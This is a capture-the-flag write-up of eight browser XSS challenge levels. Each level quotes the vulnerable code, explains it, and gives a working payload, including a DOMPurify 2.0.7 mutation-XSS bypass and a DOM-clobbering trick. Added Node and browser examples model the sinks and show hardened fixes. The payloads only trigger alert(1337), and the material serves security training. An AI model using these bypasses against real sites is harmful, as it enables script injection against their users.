XSS online range---Warmups
2022-08-03 21:12:00 【hug kitten】
Contents
Online range URL
Ma Spaghet!
Key code analysis:
spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
1. URLSearchParams defines utility methods for working with a URL's query string; new URL(location).searchParams.get('somebody') returns the URL-decoded value of the somebody parameter, or null when it is absent.
Common uses: building a query string, and reading query-string parameters.
2. innerHTML is a string property that gets or sets the HTML between an element's start and end tags. Assigning to it parses the string as HTML, which makes it an XSS sink.
The parameter is read with get() and written straight into innerHTML with no filtering of any kind, so we first try <script>alert(1)</script>.
No popup. Let's find out why.
The <script> tag was inserted through innerHTML, and the HTML5 specification says that <script> elements inserted via innerHTML are not executed (fragment parsing marks them as already started), so the element is created but never runs.
So we switch to an element whose event handler fires on its own, without a click: <img src=1 onerror=alert(1337)>. The broken src triggers the error event and the handler runs. Success: ?somebody=<img src=1 onerror=alert(1337)>
Jefff
Key code analysis:
eval(`ma = "Ma name ${jeff}"`)
setTimeout(_ => {
maname.innerText = ma
}, 1000)
1. The jeff query parameter is interpolated into a template string, and that string becomes the JavaScript source passed to eval; our value therefore lands inside the double-quoted string literal "Ma name ...".
2. setTimeout: calls a function, or evaluates a code string, after the given delay (1000 ms here).
3. innerText: sets the rendered text of the element, so markup written there is not parsed; the injection point is the eval, not the DOM write.
First we try passing alert(1337) directly: ?jeff=alert(1337).
Nothing happens. The value is substituted before eval runs, so what eval receives is ma = "Ma name alert(1337)": alert(1337) is just characters inside a string literal and is never executed.
To get code executed we have to close the string literal ourselves, end the statement, add our own call, and comment out the trailing quote that the template leaves behind.
Payload: aa";alert(1337)//
Source eval receives: ma = "Ma name aa";alert(1337)//"
The first statement assigns "Ma name aa", the second calls alert(1337), and // swallows the dangling quote so the source stays syntactically valid. Success.
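The string-context break-out above, as an added example that is not part of the original page or the challenge: a Node.js model of the Jefff sink. It builds exactly the source the level builds, evals it, and records what alert() received; window.alert is replaced by a recorder and the jeff value is passed in directly instead of being read from the URL (both are assumptions so it runs outside a browser). A hardened builder that emits the untrusted value as a JSON string literal is shown beside it.

```javascript
// Added example (not from the challenge page): a Node.js model of the Jefff sink.
// alert() is replaced by a recorder and the "jeff" value is passed in directly
// (assumptions, so the code runs outside a browser).

// Exactly the string the challenge builds before handing it to eval().
function buildSource(jeff) {
  return `ma = "Ma name ${jeff}"`;
}

// Hardened variant: the untrusted value is emitted as a JSON string literal,
// so quotes, backslashes and line terminators are escaped and cannot end the literal.
function buildSourceSafe(jeff) {
  return `ma = ${JSON.stringify("Ma name " + jeff)}`;
}

// Evaluates generated source the way the page does (direct eval in the current
// scope) and reports the resulting `ma`, the alert() calls seen, and any error.
function run(source) {
  const hits = [];
  const alert = (x) => hits.push(x); // stand-in for window.alert, visible to eval
  let ma;
  try {
    eval(source); // direct eval: `ma` and `alert` resolve from this function's scope
  } catch (e) {
    return { ma, hits, error: e.name };
  }
  return { ma, hits, error: null };
}

// What the level runs for a given jeff parameter.
function jefff(jeff) {
  return run(buildSource(jeff));
}

// The same sink with the hardened builder.
function jefffSafe(jeff) {
  return run(buildSourceSafe(jeff));
}
```

jefff('alert(1337)') leaves the call inside the string literal, jefff('aa";alert(1337)//') breaks out and the recorder sees 1337, and jefffSafe with the same payload stores the payload as plain text without running it. The real fix is of course not to eval at all: ma = "Ma name " + jeff does everything the level needs.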
Ugandan Knuckles
Key code analysis:
<script>
let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
wey = wey.replace(/[<>]/g, '')
uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>
1. replace with the regex /[<>]/g deletes every < and > from the input, so we cannot open a new tag.
2. placeholder: hint text shown while the input field is empty; it disappears when the field gains focus. Our value lands inside the double-quoted placeholder attribute.
Because the angle brackets are stripped, the first idea is to smuggle them in encoded.
Two decoders sit on the path: the browser URL-decodes the query string when searchParams.get() reads it, and the HTML parser decodes character references when the string is assigned to innerHTML. So the payload is HTML-entity-encoded first and URL-encoded on top: after URL decoding the entities survive into the HTML, and only the HTML parser turns them back into characters.
Intended payload: 1"><img src=1 onerror=alert(1337)>. Because of the browser's error recovery only the prefix 1">< needs encoding, so we enter: %26%2349%3B%26%2334%3B%26%2362%3B%26%2360%3Bimg src=1 onerror=alert(1337) (which URL-decodes to &#49;&#34;&#62;&#60;img src=1 onerror=alert(1337))
No popup. Looking at the page source shows why: the entities were decoded, but into data, not markup. The tokenizer decides where the placeholder attribute ends (at the next literal ") before character references are decoded, so &#34; becomes a quote character inside the attribute value and &#60;img ... never becomes a tag. Entity encoding can never break out of an attribute value, so we have to go another way.
The title tells us that our input sits inside an <input> tag. The filter does not touch the double quote, so we can close the placeholder attribute and add attributes of our own; an event handler that needs no user interaction is onfocus combined with autofocus.
1. onfocus: fires when the element gains focus (the cursor lands in it).
2. autofocus: the browser focuses the element automatically when the page loads.
So our payload is: 1" onfocus="alert(1337)" autofocus="  (the trailing quote pairs with the one the template supplies). Success.
The resulting markup in the page source is:
<input type="text" placeholder="1" onfocus="alert(1337)" autofocus="" class="form-control">
Ricardo Milos
Key code analysis:
<form id="ricardo" method="GET">
<input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
setTimeout(_ => {
ricardo.submit()
}, 2000)
</script>
1. action: the form's submission target; the attribute says where the form data is sent. Here it is set straight from the ricardo parameter with no validation of the URL scheme, so a javascript: URL is accepted, and submitting the form navigates to it, which runs the code.
2. submit(): submits the form programmatically, like pressing a submit button.
So we simply pass: ?ricardo=javascript:alert(1337)
Note the setTimeout around submit(): the form is submitted two seconds after the page loads, so the popup appears with a two-second delay.
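How the Ricardo Milos sink could have validated the action, as an added example that is not part of the original page or the challenge. It uses the WHATWG URL parser that browsers and Node.js both provide; the page origin https://example.test/ is an assumed constant, and the fallback '#' is the level's own default.

```javascript
// Added example (not from the challenge page): allowlisting the form action.
// PAGE_ORIGIN is an assumption standing in for location.href.
const PAGE_ORIGIN = 'https://example.test/';

// Returns the URL the form may be submitted to, or '#' (the level's default)
// when the candidate is not an http(s) URL on the page's own origin.
function safeFormAction(raw, base = PAGE_ORIGIN) {
  let url;
  try {
    // The parser resolves relative paths, lowercases the scheme and strips
    // leading/trailing whitespace and embedded tabs/newlines, so the checks
    // below see a normalised scheme rather than whatever casing the attacker used.
    url = new URL(raw, base);
  } catch {
    return '#';
  }
  // Allowlist the scheme: javascript:, data:, vbscript: and friends all fail here.
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return '#';
  // Keep submissions on our own origin so the form data cannot be sent elsewhere.
  if (url.origin !== new URL(base).origin) return '#';
  return url.href;
}
```

Checking url.protocol after parsing, rather than running a regex over the raw string, is what makes mixed-case or tab-separated javascript: variants fail too.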
Ah That's Hawt
Key code analysis:
<h2 id="will"></h2>
<script>
smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
smith = smith.replace(/[\(\`\)\\]/g, '')
will.innerHTML = smith
</script>
1. replace with /[\(\`\)\\]/g strips parentheses, backticks and backslashes, so a plain alert(1337) call cannot be written; the result still goes into innerHTML.
Because the value is parsed as HTML, character references inside an attribute value are decoded after the filter has already run. So we entity-encode the parentheses and URL-encode that for the address bar: ( and ) become &#40; and &#41;, i.e. %26%2340%3B and %26%2341%3B:
<img src=1 onerror=alert%26%2340%3B1337%26%2341%3B>
Success: the filter sees no parentheses, the HTML parser turns &#40;1337&#41; into (1337) inside the onerror value, and the handler source is alert(1337). Other sinks work the same way, for example an anchor with a javascript: URL, which needs a click on aaa to fire:
<a href=javascript:alert%26%2340%3B1337%26%2341%3B>aaa</a>
Inside an <a> href we can also use %2528 and %2529: the query string is URL-decoded once, turning them into %28 and %29, and a javascript: URL is percent-decoded again before the script runs, which yields the parentheses:
<a href=javascript:alert%25281337%2529>aaa</a>
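The two encoding results above (Ugandan Knuckles, where entities could not close the attribute, and Ah That's Hawt, where entities changed the handler's value) come from one property of the HTML tokenizer: attribute boundaries are fixed before character references are decoded. The following is an added example, not code from the page or the challenge: a miniature model of a start-tag tokenizer that handles quoted and unquoted attributes and numeric character references only, with both levels' filters reproduced from their source. Inputs are given already URL-decoded, as searchParams.get() returns them.

```javascript
// Added example (not from the challenge page): a toy start-tag tokenizer that
// shows why entity-encoded characters can change an attribute's value but can
// never close an attribute or open a new tag. Numeric references only.

// The Ugandan Knuckles sink: strip < and >, then drop the value into placeholder.
function ugandanKnuckles(wey) {
  wey = wey.replace(/[<>]/g, '');
  return `<input type="text" placeholder="${wey}" class="form-control">`;
}

// The Ah That's Hawt sink: strip ( ` ) \ and write the result to innerHTML.
function ahThatsHawt(smith) {
  return smith.replace(/[\(\`\)\\]/g, '');
}

// Character references are decoded only after the tokenizer has fixed the
// attribute boundaries; this is the step that makes &#60; harmless in a value.
function decodeNumericEntities(s) {
  return s.replace(/&#(\d+);/g, (_, n) => String.fromCodePoint(Number(n)));
}

// Tokenizes one start tag: returns its name, its attributes (values decoded)
// and whatever text follows the closing '>'.
function parseStartTag(src) {
  if (src[0] !== '<') throw new Error('expected a start tag');
  let i = 1;
  let name = '';
  while (i < src.length && /[A-Za-z0-9-]/.test(src[i])) name += src[i++];
  const attrs = {};
  for (;;) {
    while (i < src.length && /\s/.test(src[i])) i++;
    if (i >= src.length) throw new Error('unterminated start tag');
    if (src[i] === '>') { i++; break; }
    if (src[i] === '/' && src[i + 1] === '>') { i += 2; break; }
    let attrName = '';
    while (i < src.length && !/[\s=>\/"']/.test(src[i])) attrName += src[i++];
    if (attrName === '') { i++; continue; } // stray quote or slash: skip it
    while (i < src.length && /\s/.test(src[i])) i++;
    let raw = '';
    if (src[i] === '=') {
      i++;
      while (i < src.length && /\s/.test(src[i])) i++;
      const quote = src[i];
      if (quote === '"' || quote === "'") {
        // Quoted value: runs to the next matching quote, whatever it contains.
        i++;
        while (i < src.length && src[i] !== quote) raw += src[i++];
        i++; // closing quote
      } else {
        // Unquoted value: runs to whitespace or '>'.
        while (i < src.length && !/[\s>]/.test(src[i])) raw += src[i++];
      }
    }
    // Decoding happens here, after the boundaries are known.
    attrs[attrName.toLowerCase()] = decodeNumericEntities(raw);
  }
  return { name: name.toLowerCase(), attrs, rest: src.slice(i) };
}
```

Running the Ugandan Knuckles entity payload through parseStartTag(ugandanKnuckles(...)) yields a single placeholder attribute whose decoded value is 1"><img src=1 onerror=alert(1337) and nothing after the tag, while the onfocus/autofocus payload produces real onfocus and autofocus attributes. For Ah That's Hawt, alert(1337) loses its parentheses to the filter, but alert&#40;1337&#41; passes untouched and decodes to alert(1337) inside the onerror value.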
Ligma
Key code analysis:
balls = (new URL(location).searchParams.get('balls') || "Ninja has Ligma")
balls = balls.replace(/[A-Za-z0-9]/g, '')
eval(balls)
Every letter and digit in [A-Za-z0-9] is removed, so neither identifiers nor numeric literals survive, but whatever is left still reaches eval. Everything we need can be written with symbols only, which is exactly what JSFuck does: JSFuck - Write any JavaScript with 6 Characters: []()!+
First encode alert(1337) on the JSFuck page (the output is a few thousand characters long).
Then URL-encode the result before putting it in the address bar; in particular + must become %2B, otherwise the query-string parser turns it into a space. Passed as the balls parameter, it executes.
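The principle behind that encoding, as an added example that is not part of the original page and is not the JSFuck tool itself: numbers are built from []!+ and letters are picked out of the strings "false", "true", "undefined" and "NaN", which can themselves be spelled with those characters. The Function-constructor trick that turns the string "alert(1337)" into an actual call is what the real tool adds on top and is not reproduced here; the level's filter is copied from the challenge source.

```javascript
// Added example (not from the challenge page, not the JSFuck tool): a small
// builder for numbers and a few letters using only the characters []()!+.

// The level's filter, reproduced from the challenge source.
function ligmaFilter(balls) {
  return balls.replace(/[A-Za-z0-9]/g, '');
}

// A single digit: +[] is 0, and each !+[] is the boolean true, which adds as 1.
function jsfuckDigit(d) {
  if (d === 0) return '+[]';
  return '+' + Array(d).fill('!+[]').join('+');
}

// A non-negative integer: one-element arrays concatenate as strings
// ("1"+"3"+"3"+"7"), and a leading unary + turns the string back into a number.
function jsfuckNumber(n) {
  const digits = String(n).split('').map(Number);
  if (digits.length === 1) return jsfuckDigit(digits[0]);
  return '+(' + digits.map((d) => `[${jsfuckDigit(d)}]`).join('+') + ')';
}

// Expressions that evaluate to useful words using only the six characters.
const WORDS = [
  ['false', '![]+[]'],        // false + "" -> "false"
  ['true', '!![]+[]'],        // true + ""  -> "true"
  ['undefined', '[][[]]+[]'], // [][""] is undefined, + "" -> "undefined"
  ['NaN', '+[![]]+[]'],       // +["false"] is NaN, + "" -> "NaN"
];

// A single character, written as word[index]; throws when none of the words has it.
function jsfuckChar(c) {
  for (const [word, expr] of WORDS) {
    const idx = word.indexOf(c);
    if (idx !== -1) return `(${expr})[${jsfuckNumber(idx)}]`;
  }
  throw new Error(`no source word for ${JSON.stringify(c)}`);
}

// A whole string: characters concatenated with +.
function jsfuckString(s) {
  return s.split('').map(jsfuckChar).join('+');
}

// True when an expression is written entirely in the JSFuck alphabet.
function onlySixChars(expr) {
  return /^[\[\]()!+]*$/.test(expr);
}
```

jsfuckNumber(1337) evaluates to 1337, jsfuckString('alert') evaluates to the string 'alert', and both pass through ligmaFilter unchanged, which is the whole point of the alphabet.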
Mafia
Key code analysis:
mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)
1. slice(0, 50): extracts part of a string and returns it as a new string; here only the first 50 characters are kept, so the payload must be short.
2. The filter replaces every character in [\`\'\"\+\-\!\\\[\]] and every occurrence of the literal string alert with _.
So the word alert must be produced another way. One option is parseInt, which turns a string of base-N digits into a number, with Number.prototype.toString(N) turning it back: parseInt("alert", 30) is 8680439, and 8680439..toString(30) is "alert" again (the double dot is needed because 8680439. on its own is read as a number literal with a decimal point).
If we submit (8680439..toString(30))(1337) the page runs eval("(8680439..toString(30))(1337)"), which tries to call a string and throws. Wrapping the name in an inner eval turns the string into the function, so we submit:
eval(8680439..toString(30))(1337)
The inner eval evaluates "alert" and returns the alert function, which is then called with 1337. Popup.
Second option: location.hash.slice(1) returns everything after the # in the URL. The fragment is not part of the query string, so it is never filtered; we put alert(1337) there and let eval run it:
eval(location.hash.slice(1))#alert(1337)
Third option: the Function constructor, which builds a function from a source string (separate statements inside it with semicolons). /ALERT(1337)/.source is the regex's source text "ALERT(1337)"; the alert filter is case-sensitive, so the uppercase form survives it, and .toLowerCase() restores the real name before the function is built and called:
Function(/ALERT(1337)/.source.toLowerCase())()
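The three bypasses above, as an added example that is not part of the original page: a Node.js model of the Mafia sink with the level's filters copied from its source. alert() and location are replaced by stand-ins installed on globalThis so that code created with Function() (which runs in global scope) can reach them; both stand-ins are assumptions for running outside a browser. encodeWord shows where 8680439 and the radix 30 come from.

```javascript
// Added example (not from the challenge page): a Node.js model of the Mafia sink.
// window.alert and window.location are replaced by stand-ins on globalThis
// (assumptions so that the code runs outside a browser).

// The level's filters, reproduced from the challenge source.
function mafiaFilter(input) {
  let mafia = input.slice(0, 50);
  mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_');
  mafia = mafia.replace(/alert/g, '_');
  return mafia;
}

// parseInt turns a word into a number in the smallest radix that can hold all
// of its letters (parseInt(letter, 36) gives each letter's digit value);
// Number.prototype.toString(radix) reverses it.
function encodeWord(word) {
  const radix = Math.max(...word.split('').map((c) => parseInt(c, 36))) + 1;
  return { radix, value: parseInt(word, radix) };
}

// Runs the filtered input the way the page does and returns what alert() received.
// `hash` is the constructed value of location.hash for the demo.
function runMafia(input, hash = '') {
  const hits = [];
  const saved = { alert: globalThis.alert, location: globalThis.location };
  globalThis.alert = (x) => hits.push(x); // stand-in for window.alert
  globalThis.location = { hash };         // stand-in for window.location
  let error = null;
  try {
    eval(mafiaFilter(input)); // direct eval, as in the level
  } catch (e) {
    error = e.name;
  } finally {
    globalThis.alert = saved.alert;
    if (saved.location === undefined) delete globalThis.location;
    else globalThis.location = saved.location;
  }
  return { hits, error };
}
```

A bare alert(1337) becomes _(1337) after the filter and fails with a ReferenceError, while each of the three payloads stays under 50 characters, survives the filter and reaches the recorder with 1337.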
Ok, Boomer
Key code analysis:
<h2 id="boomer">Ok, Boomer.</h2>
<script>
boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
setTimeout(ok, 2000)
</script>
DOMPurify is an open-source, fast, DOM-based XSS sanitizer: it parses the input HTML into a DOM, walks the element nodes recursively removing anything dangerous, and returns the serialized, safe HTML.
We can try to bypass this library, but first we have to understand what we are up against:
Find the version loaded by the page (view the source). This level uses DOMPurify 2.0.7.
Method 1: mutation XSS (mXSS) through namespace confusion, to bypass DOMPurify
The sanitizer pipeline is: parse the input into a DOM, loop over the tree removing dangerous nodes, serialize it back to HTML, and then the application parses that string again when it assigns innerHTML. After several parses the DOM tree is not guaranteed to be the same.
In the HTML specification a form element may not have another form as a descendant; nested forms are not allowed, so a <form> start tag inside an open form is ignored by the HTML parser and the second form simply disappears. With slightly broken, incorrectly nested markup, however, a nested form can be created, by wrapping the second form in a div:
Example: <form id="outer"><div></form><form id="inner"><input>
This is not a bug in any particular browser; it follows directly from the HTML specification and the parsing algorithm it describes.
1. When the parser sees a <form> start tag it consults the form element pointer (that is what the specification calls it). If the pointer is not null, no form element is created.
2. A </form> end tag always sets the form element pointer to null.
At the beginning the pointer points to id="outer". Then the div is opened, and </form> sets the pointer to null (the div stays open). Because the pointer is null, the next form, id="inner", can be created, and because we are still inside the div, a form ends up nested inside a form.
Serializing the resulting DOM tree gives the following markup:
<form id="outer"><div><form id="inner"><input></form></div></form>
Parsing that string again ignores the inner <form> (the pointer is set this time), which proves that serializing and parsing again is not guaranteed to return the original DOM tree.
By default every element is in the HTML namespace; when the parser meets an <svg> or <math> element it switches to the SVG or MathML namespace respectively, and both count as foreign content.
In foreign content tags are parsed differently from ordinary HTML, which the <style> element shows clearly. In the HTML namespace <style> can only contain text: no descendants, and no decoding of HTML entities. In foreign content that is not the case: a foreign <style> can have child elements, and entities are decoded.
Example: <style><a>ABC</style><svg><style><a>ABC
The same tag behaves differently in the two positions: the HTML style has only text content, while the svg style is parsed like a normal element and gets an <a> child.
One might guess that inside <svg> or <math> every element is in a non-HTML namespace, but that is not so. The HTML standard defines elements called MathML text integration points and HTML integration points, and the children of these elements are in the HTML namespace again.
Note that a style which is a direct child of math is in the MathML namespace, while a second style under mtext is in the HTML namespace, because mtext is a MathML text integration point and makes the parser switch namespaces.
<mtext>: the MathML <mtext> element renders arbitrary text with no notational meaning, such as comments or annotations.
As soon as the parser reaches a text integration point, the namespace switches back automatically.
PS: not everything below a text integration point switches. In the HTML specification most children of a MathML text integration point are in the HTML namespace, with two exceptions, <mglyph> and <malignmark>: when either of them is a direct child of a MathML text integration point it does not switch, and stays in the MathML namespace.
Putting the two behaviours together, our payload is:
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1337)>
First parse (inside DOMPurify): </form> sets the form pointer to null, so the second <form> is created inside mtext as an HTML element; mglyph and style are created as its children and are therefore HTML elements too, and the HTML <style> swallows </math><img ...> as plain text. DOMPurify finds nothing to remove and serializes the tree to:
<form><math><mtext><form><mglyph><style></math><img src onerror=alert(1337)></style></mglyph></form></mtext></math></form>
Second parse (the innerHTML assignment): this time the inner <form> is not created, because the form pointer is already set, so mglyph is now a direct child of mtext and stays in the MathML namespace. Consequently style is in the MathML namespace as well, and its content is not treated as text; </math> closes the <math> element, and the img is created in the HTML namespace, whose onerror triggers the XSS.
So that payload, passed as the boomer parameter, is the bypass.
Method 2: DOM clobbering
The page calls setTimeout(ok, 2000), and ok is not defined anywhere, so the name is looked up on window. Every element with an id is exposed as a property of window under that name (window.ok for id="ok"), and DOMPurify allows the id attribute. setTimeout coerces a non-function handler to a string and evaluates that string as code, and an <a> element stringifies to its href. So we clobber ok with an anchor whose href is both a URL that DOMPurify accepts and valid JavaScript: tel: is on DOMPurify's allowed-scheme list, and in JavaScript tel: is simply a label in front of the call.
<a id="ok" href="tel:alert(1337)">aaa</a>
Any other allowed scheme works the same way, for example: <a id="ok" href="cid:alert(1337)">aaa</a>
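Both bypasses above live in the browser's HTML parser, so the added example below is a browser page rather than a Node script; it is not part of the original page or of DOMPurify. Part 1 reproduces the parse, serialize, parse-again round trip that DOMPurify 2.0.7 plus the innerHTML assignment perform, without the library, so the mutation itself can be observed: the img does not exist after the first parse and does exist after the second. Part 2 performs the DOM clobbering against the level's own setTimeout(ok, ...) call. window.alert is replaced by a recorder so nothing pops up; that replacement, and the inert DOMParser documents used in part 1, are assumptions of the demo. Open the file in a browser and read the console.

```html
<!doctype html>
<!-- Added example (not from the challenge page or DOMPurify): parser round trip
     and DOM clobbering demo. window.alert is replaced by a recorder (assumption). -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>
  const log = [];
  window.alert = (x) => log.push(x); // recorder instead of a popup

  // Part 1: namespace confusion. Parse as a DOM-based sanitizer would (into an
  // inert document, so nothing executes), serialize, and parse the result again.
  function roundTrip(html) {
    const first = new DOMParser().parseFromString(html, 'text/html');
    const serialized = first.body.innerHTML; // what the sanitizer hands back
    const second = new DOMParser().parseFromString(serialized, 'text/html');
    const mglyph = second.querySelector('mglyph');
    return {
      serialized,
      imgOnFirstParse: first.querySelector('img') !== null,
      imgOnSecondParse: second.querySelector('img') !== null,
      mglyphNamespace: mglyph ? mglyph.namespaceURI : null,
    };
  }

  const payload = '<form><math><mtext></form><form><mglyph><style></math>' +
                  '<img src onerror=alert(1337)>';
  const r = roundTrip(payload);
  console.log('serialized:', r.serialized);
  console.log('img on first parse:', r.imgOnFirstParse);   // false: it is text inside <style>
  console.log('img on second parse:', r.imgOnSecondParse); // true: the reparse created it
  console.log('mglyph namespace on second parse:', r.mglyphNamespace); // MathML, not HTML

  // Part 2: DOM clobbering. An element with id="ok" becomes window.ok, setTimeout
  // stringifies a non-function handler, and an <a> stringifies to its href.
  boomer.innerHTML = '<a id="ok" href="tel:alert(1337)">aaa</a>';
  console.log('window.ok is the anchor:', ok instanceof HTMLAnchorElement);
  console.log('String(ok):', String(ok));   // "tel:alert(1337)": valid JS, tel: is a label
  setTimeout(ok, 200);                        // evaluates "tel:alert(1337)"
  setTimeout(() => console.log('alert() received:', log), 400); // [1337]
</script>
```

The round trip deliberately never assigns the mutated markup to the live document, so the img's onerror is not run; checking for the element's existence and the mglyph namespace is enough to see the mutation. Part 2 does write to the live document, which is exactly the condition the level creates.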